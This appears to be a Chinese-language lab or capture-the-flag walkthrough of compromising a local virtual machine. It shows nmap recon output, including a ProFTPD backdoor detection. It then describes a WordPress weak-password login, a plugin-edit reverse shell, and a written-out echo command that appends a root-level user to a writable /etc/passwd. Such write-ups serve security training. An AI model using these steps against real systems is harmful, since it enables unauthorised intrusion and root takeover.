信息收集

# nmap -sn 192.168.1.0/24 -oN live.nmap                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-11 15:19 CST
Nmap scan report for 192.168.1.1
Host is up (0.00023s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.67
Host is up (0.00050s latency).
MAC Address: 00:0C:29:D3:F7:96 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00011s latency).
MAC Address: 00:50:56:EE:93:F5 (VMware)
Nmap scan report for 192.168.1.60

判断存活主机为192.168.1.67！

# nmap -sT --min-rate 10000 -p- 192.168.1.67 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-11 15:21 CST
Nmap scan report for 192.168.1.67
Host is up (0.0041s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:D3:F7:96 (VMware)Nmap done: 1 IP address (1 host up) scanned in 2.86 seconds

开放端口为22 21 80端口，分别是ftp ssh 和http服务！

# nmap -sT -sC -sV -O -p80,21,22 192.168.1.67 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-11 15:22 CST
Nmap scan report for 192.168.1.67
Host is up (0.00064s latency).PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:D3:F7:96 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds

探测到的服务版本和操作系统相关信息为：21端口 ProFTPD 1.3.3c 22端口 OpenSSH 7.2p2 80端口为Apache httpd 2.4.18 操作系统是ubuntu运行在vm上！

# nmap -sT --script=vuln -p21,22,80 192.168.1.67 -oN vuln.nmap
Host is up (0.0012s latency).PORT   STATE SERVICE
21/tcp open  ftp
| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /secret/: Potentially interesting folder
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:D3:F7:96 (VMware)Nmap done: 1 IP address (1 host up) scanned in 392.81 seconds

经过探测，ftp存在后门，root用户，80端口上存在一个secret目录！

渗透测试

先看看ftp：搜索相关ftp漏洞

尝试利用下这个脚本：GitHub - shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script: A script to interact with the ProFTPD-1.3.3c inbuilt backdoor

利用这个漏洞脚本，直接就能拿下root权限~

80端口

80端口上看了存在secret目录，访问：

利用wpscan进行扫描，发现，存在用户admin！

尝试利用字典进行爆破：

发现admin账号的密码是admin，弱口令~ 登录！

找到可以编辑的插件index.php：

尝试在这个插件中编辑相关的代码 phpinfo(); 访问：

结合目录扫描的结果，进行访问：

成功执行了我们的代码，尝试写反弹shell！

成功拿到初始的shell。

提权

在网站的目录下，发现了wp-config.php文件，查看得到了mysql的用户名和密码相关信息：

尝试登录mysql：

查看/etc/passwd文件，在数据库中没找到什么有用的信息~

发现了一个用户为marlinspike！进入到对应的家目录下面，发现存在wordpress目录，然后进入这个目录后，又发现了wordpress的相关文件，在配置文件中找到了另一个数据库的账号和密码信息：

但是没办法成功登录~ 查看了/etc/passwd文件的属性，发现当前用户具有可读可写的权限：

因此我们就可以创建一个与root用户权限相同的用户root3，利用openssl创建一个字符串的哈希值，用来作为密码：

echo "root3:\$1\$plc1IwyZ\$DKoT0Pyl.5CVtiNQ2Kn/k/:0:0:root:/root:/bin/bash" >>/etc/passwd

切换到我们创建的root3用户：

成功提权到root权限~ 至此靶机成功拿下，整个打靶的过程用到了两个方法，一个是ftp-proftpd-backdoor漏洞；另一个是直接利用80端口上的http服务拿下！